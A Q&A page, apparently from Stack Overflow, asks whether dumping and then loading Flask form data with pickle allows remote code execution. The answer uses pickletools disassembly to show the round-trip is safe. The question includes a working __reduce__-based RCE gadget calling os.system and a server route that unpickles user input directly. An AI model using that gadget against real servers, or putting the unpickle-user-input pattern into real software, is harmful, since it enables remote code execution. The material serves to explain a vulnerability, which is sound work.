Disclaimer: This question is not for malicious purposes!! I am working on my OWN virtual machine!
The article here demonstrates how loading untrusted pickle data can lead to remote code execution. I am investigating ways of using this workflow without the security issues.
My question is as follows: if the webapp gets a request in Flask, calls pickle.dumps() on request.form, then calls pickle.loads() on what was just dumped, is there still a way to execute malicious code?
Example server code:
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
    test = pickle.dumps(request.form)
    test2 = pickle.loads(test)  # THE CODE SHOULD BE EXECUTED AT THIS POINT
    return ...
Is this workflow still vulnerable? From my understanding, the most common type of pickle exploit happens when a base64 string is passed through and interpreted by pickle.loads(). However, is it possible to achieve the same result if pickle.dumps() is called on the form prior to pickle.loads()?
I have tried a couple things, but nothing has panned out. Please let me know if you know the secret code :)
Here is an example of malicious user code from the same article:
import pickle
import base64
import os
class RCE:
    def __reduce__(self):
        cmd = ('echo EXECUTED THIS STATEMENT')
        return os.system, (cmd,)
if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
    # Running pickle.loads(pickle.dumps(RCE())) would execute 'echo EXECUTED THIS STATEMENT'
    # I need to pass through RCE() because pickle.dumps() and pickle.loads() are server-side
That would print a base64 string that, when decoded and interpreted by pickle.loads(), would execute the command in cmd.
But how can you pass the result of RCE() in a request so that it is then dumped by pickle.dumps() on the server side, before pickle.loads(), and still executes malicious code?
Example (This code does not work):
client code
import os
import requests
class RCE:
    def __reduce__(self):
        cmd = ('echo EXECUTED THIS STATEMENT')
        return os.system, (cmd, )
data = {
    'test': RCE()
}
s = requests.Session()
# URL is the base address of the server, defined elsewhere
r = s.post(URL + "/test", data=data)
server-side code
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
    test = pickle.dumps(request.form)
    test2 = pickle.loads(test)  # THE CODE SHOULD BE EXECUTED AT THIS POINT
    return ...
Example (This code works):
client code
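import os
import pickle
import requests
class RCE:
    def __reduce__(self):
        cmd = ('echo EXECUTED THIS STATEMENT')
        return os.system, (cmd, )
data = {
    'test': pickle.dumps(RCE())
}
s = requests.Session()
# URL is the base address of the server, defined elsewhere
r = s.post(URL + "/test", data=data)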
server-side code
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
    test2 = pickle.loads(request.form['test'])  # THE CODE SHOULD BE EXECUTED AT THIS POINT
    return ...
My thinking is the following: is it possible to have a string that, when serialized by pickle.dumps() on the server side, returns the same value as if pickle.dumps(RCE()) had been executed on the client side? Of course, the result of pickle.dumps() on the server side would be a little different because of the request.form aspect. From my understanding, as long as there is executable code in the string, pickle.loads() will execute it.
Answer:
No, there is no way to make the server execute remote code by just dumping the input and then loading that dump, but for the same reason this workflow cannot load pickled data structures sent by the client either.
I will use pickletools.dis to demonstrate what actually happens:
import pickle
import pickletools
class RCE:
    def __reduce__(self):
        return eval, ("print('MALICIOUS PYTHON CODE HERE')",)
pickled_malicious = pickle.dumps(RCE())
print("what is executed when loading malicious pickle:")
pickletools.dis(pickled_malicious)
print("pickle is type:", type(pickled_malicious))
pickled_string = pickle.dumps(pickled_malicious)
print("what is executed when loading the dump of malicious")
pickletools.dis(pickled_string)
When the malicious pickle is loaded, it loads the function (eval or os.system) as well as its argument, and then the REDUCE opcode calls that function:
what is executed when loading malicious pickle:
0: \x80 PROTO 3
2: c GLOBAL 'builtins eval'
17: q BINPUT 0
19: X BINUNICODE "print('MALICIOUS PYTHON CODE HERE')"
59: q BINPUT 1
61: \x85 TUPLE1
62: q BINPUT 2
64: R REDUCE
65: q BINPUT 3
67: . STOP
The pickled malicious payload itself, though, is just a bytes object:
pickle is type: <class 'bytes'>
So if you dump it, loading that dump just yields a literal bytes object (or a str if you are base64-encoding it; either way it is only a literal at this point):
what is executed when loading the dump of malicious
0: \x80 PROTO 3
2: C SHORT_BINBYTES b"\x80\x03cbuiltins\neval\nq\x00X#\x00\x00\x00print('MALICIOUS PYTHON CODE HERE')q\x01\x85q\x02Rq\x03."
72: q BINPUT 0
74: . STOP
highest protocol among opcodes = 3
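The difference between the two disassemblies can also be checked programmatically. The sketch below is only an illustration: it uses pickletools.genops to collect opcode names, the helper opcode_names and the CALL_OPCODES set are names made up for this example (the set is not exhaustive), and the payload uses a harmless eval expression. It is not meant as a security filter.

```python
import pickle
import pickletools

class RCE:
    def __reduce__(self):
        # Harmless stand-in for the malicious payload above
        return eval, ("6 * 7",)

# Opcodes that import or call something during loading (illustrative, not exhaustive)
CALL_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def opcode_names(data):
    """Return the set of opcode names in a pickle stream (hypothetical helper)."""
    return {opcode.name for opcode, arg, pos in pickletools.genops(data)}

pickled_malicious = pickle.dumps(RCE())
pickled_again = pickle.dumps(pickled_malicious)

# The malicious pickle contains REDUCE plus an opcode that looks up eval
print(sorted(opcode_names(pickled_malicious) & CALL_OPCODES))
# The dump of the malicious bytes contains only a bytes literal
print(sorted(opcode_names(pickled_again) & CALL_OPCODES))  # → []
```

The exact opcodes in the first line depend on the pickle protocol in use, but REDUCE is present in every case.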
This means that if the server just calls pickle.dumps on the input (a string of base64 data or a bytes object containing pickle data; either way it is just a literal value when it is dumped), then calling pickle.loads on that result simply gives back the original input.
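A minimal sketch of that contrast, assuming a harmless eval expression in place of a real command so that the effect shows up in the return value. The variable names are illustrative only.

```python
import pickle

class RCE:
    def __reduce__(self):
        # Harmless stand-in: loading this pickle calls eval("6 * 7")
        return eval, ("6 * 7",)

user_input = pickle.dumps(RCE())  # what an attacker would send, as bytes

# Vulnerable pattern: the user's bytes are interpreted as pickle data,
# so the callable from __reduce__ runs and its result is returned.
print(pickle.loads(user_input))  # → 42

# Workflow from the question: dump the input, then load that dump.
# The payload is stored as a bytes literal and comes back unchanged.
round_tripped = pickle.loads(pickle.dumps(user_input))
print(round_tripped == user_input)  # → True
print(type(round_tripped))  # → <class 'bytes'>
```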
Any scenario that interprets user input as pickle data is vulnerable - but you aren't doing that here - you are creating pickle data from known safe input (the input string) and then loading that.
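To illustrate why the input here is only a string: form-encoded values reach the server as text, so an object placed in the client's data dict is sent as its str() form and never as a live object. The sketch below assumes urllib.parse.urlencode and parse_qs as stand-ins for what requests and Flask do with form data (they are not the same code paths), and a plain dict as a stand-in for request.form.

```python
import os
import pickle
from urllib.parse import parse_qs, urlencode

class RCE:
    def __reduce__(self):
        cmd = "echo EXECUTED THIS STATEMENT"
        return os.system, (cmd,)

# Client side: form-encoding calls str() on the value; __reduce__ is never consulted
body = urlencode({"test": RCE()})

# Server side: parsing the body yields plain strings
form = {key: values[0] for key, values in parse_qs(body).items()}
print(repr(form["test"]))  # something like '<__main__.RCE object at 0x...>'

# Dumping and loading the parsed form gives back the same strings; nothing is executed
restored = pickle.loads(pickle.dumps(form))
print(restored == form)  # → True
```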